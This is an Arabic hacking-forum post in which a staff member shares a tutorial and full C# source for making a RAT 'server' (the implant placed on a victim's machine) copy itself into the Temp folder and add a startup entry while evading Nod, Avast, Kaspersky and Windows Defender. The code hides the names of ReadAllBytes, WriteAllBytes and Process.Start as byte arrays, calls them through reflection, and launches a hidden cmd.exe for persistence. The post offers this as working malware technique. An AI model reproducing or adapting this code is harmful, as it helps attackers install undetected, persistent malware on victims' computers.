24.11.2017 انسخ سيرفرك على الهارد وثبته بدون اي حركة من الحمايات [Nod-KasperSky-Avast-Windows Defender..Etc]


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,620
3,576
1
حياكم الله ياشباب
اسف بكتب الموضوع كيف مكان لان نعسان للان مانمت
بسبب الكلام اللي صار بالموضوع ذاك هههه
حطيت راسي براس الحمايات ومشكلة نسح السيرفر على الهارد
تم التجريب على نود وافاست وكاسبر وويندوز ديفيندر
تم نسخ الملف على الهارد بمجلد التيمب بدون ماتحكي اي حماية اي حرف
وتم اضافة مفتاح جديد ببدء التشغيل بدون مايحكو ولاحرف
والفديو السابق ببين هالشي كمان ..
الشرح مدته ساعه الا شوي..اسف لذلك بس انصح المبتدئين بالمتابعة
لان بدكم تعتبروه درس بالسي شارب ههه
الان حليت انا المشكلتين الكفيلتين بجعل السيرفر لايتخطى
باقي مشكلة واحدة انا حليتها قبل بسورس كلاينت الريفينج رات
هوة انك ماتخلي السيرفر يسجل اي قيمة بالريجيستري
او يعمل جلب لاي قيمة من الريجيستري
وهيك قدرت وقتها انني مااشيل اي خاصية بالكلاينت
فقط ماكان السيرفر فيه تثبيت
الان فيه تثبيت وفيه نسخ سيرفرك محفوظ باي مجلد بدك اياه ومفتاح بدء التشغيل
تابع للمسار اللي انت مختاره
الفكرة كانت فقط بعمل writeallbytes عن طريق typeof
وايضا عمل بروسس ستارت بالطريقة ذاتها
طريقة الكتابة هذه اعجبتني وتتخطى الحمايات
مهما كان كودك الاصلي بيتحسسو منه
بالطريقة هذه مابيتحسسو من اي دالة
طبعا عند جلب الميثود المرادة GetMethod ماضمنتها
بشكل سترينج عشان التخطي يصبح كامل
ومااحد يتحرك
سويتها بايت اراي وجلبت السترينج من البايت اراي
الاكواد كلين ومش مكشوفة ابدا ..
بتتخطى وكلين
صورة عن الاكواد
شرحت كل تفصيلة بالسورس كل حرف منه
لاتخاف بس شوف الفديو ورح تفهم كل شي






C#:
using System.Windows.Forms;
namespace WindowsFormsApp30
{
    static class Program
    {
        /// <summary>
        /// The main entry point for the application.
        /// </summary>
        [System.STAThread]
        static void Main()
        {
            var portableExeDir = Application.ExecutablePath;
            if (portableExeDir != System.IO.Path.GetTempPath()+Properties.Resources.Anti)
            {
                try
                {
              
                    typeof(System.IO.File).GetMethod(System.Text.Encoding.ASCII.GetString(Windows()), new[] { typeof(string), typeof(byte[]) })?.Invoke(null, new[]
                    {System.IO.Path.GetTempPath() + Properties.Resources.Anti, typeof(System.IO.File).GetMethod(System.Text.Encoding.ASCII.GetString(Microsoft())
                            , new[] { typeof(string) })?.Invoke(null, new object[] { Application.ExecutablePath })
                    });
                    typeof(System.Diagnostics.Process).GetMethod(System.Text.Encoding.ASCII.GetString(Process()), new[] { typeof(string) })?.Invoke(null, new object[]
                        { System.IO.Path.GetTempPath() + Properties.Resources.Anti });
                }
                catch { // ignored
}
                try {
                    var startInfo = new System.Diagnostics.ProcessStartInfo
                    {
                        FileName = @"C:\Windows\system32\cmd.exe",
                        Arguments = $"/k {Properties.Resources.Microsoft + " " + System.IO.Path.GetTempPath() + Properties.Resources.Anti}",
                        WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
                    };
                    var myProcess = GetMyProcess(startInfo);
                    myProcess.Start();
                }
                catch { // ignored
}
                }
                else
                {
                    Run();
                }
        }
 
        private static byte[] Process()
        {
        
            byte[] process = {
                0x53, 0x74, 0x61, 0x72, 0x74
            };
            return process;
        }
      
        private static void Run ()
        {
            MessageBox.Show(Properties.Resources.HackedByBasharBachir);
        }
        private static System.Diagnostics.Process GetMyProcess(System.Diagnostics.ProcessStartInfo startInfo)
        {
            return new System.Diagnostics.Process { StartInfo = startInfo };
        }
        private static byte[] Microsoft()
        {
            byte[] microsoft = {
                0x52, 0x65, 0x61, 0x64, 0x41, 0x6C, 0x6C, 0x42, 0x79, 0x74, 0x65, 0x73
            };
            return microsoft;
        }
        private static byte[] Windows()
        {
            byte[] windows = {
                0x57, 0x72, 0x69, 0x74, 0x65, 0x41, 0x6C, 0x6C, 0x42, 0x79, 0x74, 0x65,
                0x73
            };
            return windows;
        }
    }
}
الفديوهات بالرابط هنا
https://drive.google.com/file/d/1D8ksgHwOtK-_njdOT_FQcG-L9Rg3XHrb/view?usp=sharing
 

إخلاء مسؤلية

  • المنتدى غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به protection-tips غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به من بيع وشراء وإتفاق وأعطاء معلومات موقعه التعليقات المنشورة لا تعبر عن رأي معهد المنتدى ولا نتحمل أي مسؤولية قانونية حيال ذلك (ويتحمل كاتبها مسؤولية النشر).).

الإنتقال السريع

User Menu

تابعنا على الفيسبوك